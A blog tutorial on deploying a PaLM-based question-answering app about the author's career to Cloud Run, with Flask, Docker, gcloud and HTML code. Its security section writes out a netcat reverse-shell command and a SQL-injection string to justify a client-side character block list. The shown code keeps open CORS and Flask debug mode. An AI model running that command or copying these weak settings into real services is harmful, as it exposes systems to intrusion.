Deploying a Google Cloud Generative AI App in a Website with Cloud Run

Rubens Zimbres
Google Cloud - Community
11 min read · Jul 14, 2023

In May 2023 I quit my job to spend some months relaxing, organizing knowledge, learning new things and going back to swimming. The last 6 years were a wild ride using ML, Deep Learning and Google Cloud in a Brazilian startup, delivering PoCs, projects and working on R&D. After leaving the company, I developed a personal website where I wanted to concentrate all my activities, articles, projects, papers, social media presence and experiments.

I bought a domain at Google Domains (www.rubenszimbres.phd) and started developing the website using Google Sites, which is very intuitive. I wanted it to be interactive and also contain some Generative AI applications.

The first thing I did was to develop a customized QR Code to send me an email, with HuggingFace QR Code Art Generator, available here. Although the app has lots of hyperparameters, it was quite simple to generate this working result:

QR Code — Send me an email

However, I wanted something more interactive. What if people could ask details about my professional path, instead of scrolling the About me page? Then I had the idea of developing an application using Generative AI.

In this article I will provide the details of the process to create and deploy a Generative AI application, including costs and some cybersecurity aspects to ensure the safety of the web application.

When you enter the Vertex AI page in Google Cloud, you have some options regarding Generative AI:

  • Model Garden: here you can find models for classification, extraction, summarization, conversational chatbots, transcription and embedding generation. In Model Garden you can also fine-tune EfficientNet and YOLO for classification and object detection. There are also pre-built models for detecting cars and people, for content classification, and for syntactic and sentiment analysis, among others.
  • Generative AI Studio: composed of language and speech APIs for use in chatbots, text summarization, content generation, classification and question answering, speech-to-text and text-to-speech. Here you have multiple modalities of models and you can tune them with your own data.
Generative AI tools in Google Cloud

In the Google Cloud console / Vertex AI, I selected Generative AI Studio and created a new prompt. As Context, I provided my professional path so far, and also provided some Examples of simple questions and answers, so that the model can make use of few-shot learning, a Machine Learning technique that allows a pre-trained model to generalize over new data using only a few labeled samples:

On the right side of the Google Cloud console, you can tune the hyperparameters of the text generation algorithm (in this case text-bison@001).

The higher the Temperature, the more random, diverse and creative the response will be. I wanted the response to be strictly related to my professional path, so I used 0.2. I set the Token limit to 256 (the maximum amount of text that is generated). For Top-k I used 1 (the range is 1 to 40) to restrict the candidate tokens and obtain a more focused, less diverse response: a small top-k restricts the choices of the algorithm, while a bigger top-k allows it more freedom. Top-p stands for the cumulative probability threshold of the tokens considered for the response. For a wider range of responses, I used 0.8, so the model can effectively build a response using data from one or more paragraphs.
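To build intuition for how these hyperparameters interact, here is a minimal, self-contained sketch of temperature scaling plus top-k and top-p (nucleus) filtering over a toy next-token distribution. The token names, logits and helper name are made up for illustration; the real API applies this logic internally:

```python
import math

def filter_and_renormalize(logits, temperature=0.2, top_k=1, top_p=0.8):
    """Apply temperature scaling, then top-k and top-p (nucleus) filtering,
    to a dict of token -> logit, returning a renormalized distribution."""
    # Temperature: lower values sharpen the distribution (less random output)
    scaled = {t: l / temperature for t, l in logits.items()}
    # Softmax (subtract the max for numerical stability)
    m = max(scaled.values())
    exp = {t: math.exp(l - m) for t, l in scaled.items()}
    z = sum(exp.values())
    probs = {t: v / z for t, v in exp.items()}
    # Top-k: keep only the k most probable tokens
    ranked = sorted(probs.items(), key=lambda kv: kv[1], reverse=True)[:top_k]
    # Top-p: keep the smallest prefix whose cumulative probability reaches top_p
    kept, cum = [], 0.0
    for tok, p in ranked:
        kept.append((tok, p))
        cum += p
        if cum >= top_p:
            break
    z = sum(p for _, p in kept)
    return {tok: p / z for tok, p in kept}

toy_logits = {"cloud": 2.0, "run": 1.5, "flask": 0.5}
print(filter_and_renormalize(toy_logits))  # with top_k=1, a single token survives
```

With temperature 0.2 and top-k 1, the model is effectively greedy, which is what makes the responses focused and reproducible.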

The scope for hyperparameter tuning is huge. My idea was to build an MVP (Minimum Viable Product) first and then work on the fine details. You will see that the integration of GitHub with Google Cloud Build makes CI/CD trivial, as you only git commit from the command line to update the container code.

As this was a personal project, I opted not to use Dialogflow, as I didn’t know how much traffic the app would receive and it could become costly. However, if you are interested in that kind of solution (semantic search, conversational chatbot integration, summarization, etc.), you can use Gen App Builder. As I like to build things from scratch, I opted for a container hosted in Cloud Run, where I can control exactly how much money I will spend. I’ll talk about infrastructure and costs later in this article.

Back to the text generation model: the right side of the Google Cloud console also shows a < > View Code button. If you click it, you get the code to operationalize the solution, which we will save in a prediction.py file. Here I added the Flask application:

import vertexai
from vertexai.language_models import TextGenerationModel
from flask import Flask, request, jsonify
from flask_cors import CORS
import json

vertexai.init(project="your-project", location="us-central1")
parameters = {
    "temperature": 0.2,
    "max_output_tokens": 256,
    "top_p": 0.8,
    "top_k": 1
}
model = TextGenerationModel.from_pretrained("text-bison@001")

app = Flask(__name__)
CORS(app)

@app.route('/predict', methods=['POST'])
def predict():
    # Parse the incoming JSON payload: {"text": "<user question>"}
    if request.get_json():
        x = json.dumps(request.get_json())
        print('ok')
        x = json.loads(x)
    else:
        x = {}
    data = x["text"]  # the user's question
    print(data)

    response = model.predict(
        """Rubens Zimbres professional path here ....

Q: Which languages Rubens speak ?
A: His English is fluent, he speaks native Portuguese and advanced spanish

Q: Where did Rubens work ?
A: He worked at Intellimetri as a Senior Data Scientist and Machine Learning Engineer, at Vecto Mobile as a data scientist and as a Business Intelligence Analyst at Doux Dermatology

Q: Which cloud technologies does Rubens work with ?
A: AWS and Google Cloud, but mainly Google Cloud

Q: {} ?
A:
""".format(data), **parameters)

    response = jsonify(response.text)
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response


if __name__ == "__main__":
    app.run(port=8080, host='0.0.0.0', debug=True)

I used text-bison@001, the PaLM API’s most capable text generation model at the time. It is optimized for language tasks such as:

  • Code generation
  • Text generation
  • Text editing
  • Problem solving
  • Recommendations generation
  • Information extraction
  • Data extraction or generation
  • AI agent

It can also handle zero-, one-, and few-shot tasks, which is useful for our use case.
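For illustration, the few-shot prompt embedded in prediction.py can also be assembled programmatically. This is a sketch; the build_prompt helper is mine, not part of the Vertex AI SDK:

```python
def build_prompt(context, examples, question):
    """Assemble a few-shot prompt: context, then Q/A example pairs,
    then the user's question with an empty answer slot for the model."""
    parts = [context, ""]
    for q, a in examples:
        parts += [f"Q: {q} ?", f"A: {a}", ""]
    parts += [f"Q: {question} ?", "A:"]
    return "\n".join(parts)

prompt = build_prompt(
    "Rubens Zimbres professional path here ....",
    [("Which languages Rubens speak",
      "His English is fluent, he speaks native Portuguese and advanced spanish")],
    "Which cloud technologies does Rubens work with",
)
print(prompt)
```

A zero-shot prompt is the same call with an empty examples list; the model then relies only on the context and the question.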

As we are deploying in Cloud Run, we have to build a Flask application inside the container, embedded in the code. Besides, we need a requirements.txt file:

Flask==2.2.2
Flask-Cors==4.0.0
google-cloud-aiplatform==1.27.1

And also a Dockerfile:

FROM python:3.9

EXPOSE 8080
ENV PORT 8080

RUN groupadd -g 1000 userweb && \
    useradd -r -u 1000 -g userweb userweb

WORKDIR /home
RUN chown userweb:userweb /home

USER userweb

COPY . /home
RUN pip install -r /home/requirements.txt

CMD python3 /home/prediction.py

Note that I’m not using USER root, for security reasons. Best practice tells us to avoid running containers as the root user, because if a malicious actor gets a reverse shell, they will have access to absolutely everything.

Once we have these three files (prediction.py, requirements.txt and Dockerfile) in the same folder locally, we will run the following code with gcloud to build an image in Google Cloud Artifact Registry:

gcloud auth login
gcloud config set project your-project
gcloud builds submit --tag gcr.io/your-project/container-xxx . --timeout=85000

Now that the image has been built in Artifact Registry, we will deploy it to Cloud Run. Cloud Run calls the Gen AI API via its service account, internally on GCP. You should never store your service account key.json inside a container for authentication.

Note that I talked about the costs of the solution. In this case, I’m using 1 CPU with 512 MB of memory (yes, that small!), with both minimum and maximum instances set to 1, so one instance is always running:

gcloud run deploy container-genai-xxx \
  --image gcr.io/your-project/container-xxx \
  --min-instances 1 --max-instances 1 \
  --cpu 1 --memory 512Mi --concurrency 3 \
  --region us-central1 --allow-unauthenticated

It was a very interesting experience to develop something so tiny. The total response time for the app is 2.59 seconds, mainly due to the Gen AI endpoint response delay; the Flask response takes 259 milliseconds. If you allow Cloud Run to scale to zero (minimum instances = 0), you will save money drastically, but the response time increases to 12 seconds due to cold starts.

The costs of the solution come from Artifact Registry (image storage), Cloud Run, networking, and the API calls to Generative AI in Vertex AI. Overall, this small-scale solution costs me 0.70 USD daily, plus the Gen AI API calls, which cost 0.001 USD per 1,000 characters.
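A back-of-the-envelope check of those numbers (the daily call volume and average characters per call below are made-up assumptions, not measurements):

```python
daily_infra = 0.70            # Cloud Run + Artifact Registry + networking, USD/day
price_per_1k_chars = 0.001    # Gen AI API price, USD per 1,000 characters

# Assumption: 200 calls/day averaging 1,500 characters (prompt + response) each
calls_per_day, chars_per_call = 200, 1_500
api_daily = calls_per_day * chars_per_call / 1_000 * price_per_1k_chars

monthly = 30 * (daily_infra + api_daily)
print(f"API: {api_daily:.2f} USD/day, total: {monthly:.2f} USD/month")
# API: 0.30 USD/day, total: 30.00 USD/month
```

Under these assumptions the always-on instance, not the API calls, dominates the bill, which is why scaling to zero saves so much.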

Note that this can scale to a huge number of API calls by adapting the CPU, memory, concurrency and min/max instances, as Cloud Run supports autoscaling.

The endpoint is running, but there was nothing on my website yet. In fact, I had previous experience with forms in HTML, but I had never called an endpoint from a website page and had no idea how to do it. As Bard was still an early experiment regarding code generation, I asked ChatGPT, which helped build 80% of the HTML application, though it didn’t solve the problem appropriately at first. I used the following prompt:

“I’d like to build an HTML page with a text area to collect input from the user with 4 rows and 50 columns, submit this text using an HttpRequest with the POST method to an endpoint called endpoint.xxx.app/predict, sending a stringified JSON in the following format {“text”: text}. Then, I want the HTTP response to be assigned to a new element with id response.”

The code provided by ChatGPT didn’t work perfectly, and Duet AI helped me to create the HTTP assignment for the response. Here’s the final code:

<!DOCTYPE html>
<html>

<head>
  <title>Gen AI App</title>
  <style>
    /* Add a CSS style block to modify the button color */
    #submitBtn {
      background-color: lime;
    }
  </style>
</head>

<body>

  <form>
    <textarea id="textInput" maxlength="150" rows="4" cols="70" name="textInput" oninput="updateCharacterCount()"></textarea>
    <div id="characterCount"></div>
    <br>
    <input id="submitBtn" type="button" value="Generate Response" onclick="return validateAndSubmit()">
  </form>

  <br>
  <div id="response"></div>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

  <script>
    // Show how many of the 150 allowed characters remain
    function updateCharacterCount() {
      var textarea = document.getElementById("textInput");
      var characterCount = document.getElementById("characterCount");
      characterCount.innerHTML = 150 - textarea.value.length;
    }
  </script>
  <script>
    // Block special characters before submitting the form
    function validateAndSubmit() {
      var textarea = document.getElementById("textInput");
      var input = textarea.value;
      var regex = /[,"\\\/#@*|!=]/g;

      if (regex.test(input)) {
        alert("Invalid input! The symbols , \" \\ / # @ * | ! and = are not allowed.");
        return false;
      }

      submitText();
    }
  </script>
  <script>
    // POST the question to the Cloud Run endpoint and display the answer
    function submitText() {
      var texto = document.getElementById("textInput").value;
      $.ajax({
        url: 'https://container-xxx.a.run.app/predict',
        type: 'POST',
        contentType: 'application/json',
        data: JSON.stringify({"text": texto}),
        success: function(response) {
          document.getElementById("response").innerText = response;
        }
      });
    }
  </script>
</body>
</html>

This code worked perfectly (response 200 in Cloud Run monitoring), but in my case, the button was not returning the response in the web page.

When I right-clicked the form on the published website and opened Inspect / Network, I got the following: a CORS error.

I asked Bard: “What are the causes of CORS errors in a website and how can I solve them?”. The response was: the origin of the request is not allowed to access the resource. By Googling CORS + “origin of the request is not allowed to access the resource” + Flask, I was able to fix the code in the container by adding CORS(app):

from flask_cors import CORS

app = Flask(__name__)
CORS(app)

However, what happened is subtle: by enabling CORS (Cross-Origin Resource Sharing) for any origin, I introduced a vulnerability into the website, because malicious actors (hackers) can now try to inject code via the form, in attacks such as XSS (Cross-Site Scripting), CSRF (Cross-Site Request Forgery) or even SQL Injection. It’s reported that around 70% of cyberattacks happen because of misconfigurations.

To reduce the attack surface regarding these vulnerabilities, it is crucial to properly configure CORS policies on the server-side, validate and sanitize input data, implement appropriate access controls, and follow security best practices throughout the application development process.
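On the server side, “properly configuring CORS” boils down to echoing Access-Control-Allow-Origin only for an explicit allowlist instead of the * wildcard used above. A framework-agnostic sketch of that decision (the allowlist is illustrative):

```python
# Illustrative allowlist: only the site's own domain may call the endpoint
ALLOWED_ORIGINS = {"https://www.rubenszimbres.phd"}

def cors_header_for(origin):
    """Return the Access-Control-Allow-Origin value for a request's Origin
    header, or None when the origin is not allowed (omitting the header
    makes the browser block the cross-origin response)."""
    return origin if origin in ALLOWED_ORIGINS else None

print(cors_header_for("https://www.rubenszimbres.phd"))  # allowed, echoed back
print(cors_header_for("https://evil.example"))           # None: browser blocks
```

With Flask-CORS, the equivalent is passing origins=[...] to CORS(app) instead of relying on the permissive default.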

One of the tools I applied to mitigate this weakness is the validateAndSubmit() script: it validates input before submitting the form data. Sanitizing is not so simple (and this should be addressed in Generative AI cybersecurity studies), as we need the ‘ (single quote) character in natural language, as in “I’d like to know …”. If we block only double quotes (as in “ OR “A”=”A”), an attacker can still run ‘ OR ‘A’ = ‘A’ in a SQL Injection. However, removing some special characters makes it a little more difficult to get a reverse shell on the container. For instance, docker run raesene/ncat 192.168.200.1 8989 -e /bin/sh will not work. Any prompt with special characters other than the single quote will not submit data to the endpoint.
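The same check can be mirrored server-side, so the container does not depend on client-side validation alone. A sketch using the same character blocklist as the JavaScript regex (the helper name is mine):

```python
import re

# Same blocklist as the front-end regex: , " \ / # @ * | ! =
BLOCKED = re.compile(r'[,"\\/#@*|!=]')

def is_valid_input(text, max_length=150):
    """Reject input containing blocked special characters or exceeding
    the textarea's 150-character limit."""
    return len(text) <= max_length and not BLOCKED.search(text)

print(is_valid_input("I'd like to know where Rubens worked"))  # True: ' is allowed
print(is_valid_input('" OR "A"="A'))                           # False: injection attempt
```

Applying this inside the /predict handler before calling model.predict would reject requests that bypass the browser form entirely, e.g. direct curl calls.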

Then I tested the domain for CORS misconfiguration with Corsy and CORScanner. Both returned no misconfigurations after the adjustments:

Now the application is safe and working well:

Qualitatively analyzing the results, they seem correct for an MVP, without any hyperparameter tuning and with only 3 short examples provided. Based on the question and the response below, I initially thought there could be bias in the response:

However, when I asked if I was a fit for the role of Junior Data Engineer, the LLM surprised me:

The results are reproducible, as I set the LLM hyperparameters to obtain a less diverse result. You can access the app on the home page of my website and also at:

https://www.rubenszimbres.phd/generative-ai

Once the MVP is complete, we can improve hyperparameter tuning for better responses. But what if you want to run multiple tests and deploy a new version of the code within 5 minutes? Do you have to run gcloud builds submit --tag gcr.io… + gcloud run deploy container-xxx… every time?

The answer is No. In the Cloud Run console, there is a button:

There you can connect your repository to continuous deployment on Cloud Run via Cloud Build: whenever you commit code to the GitHub repo, a new revision is built and traffic is automatically redirected to the new deployment.

Time for you to try. With as few as 10 lines of Python code, and a small infrastructure, you can make use of all Generative AI capabilities of Google Cloud =)


I’m a Senior Data Scientist and Google Developer Expert in ML and GCP. I love studying NLP algos and Cloud Infra. CompTIA Security +. PhD. www.rubenszimbres.phd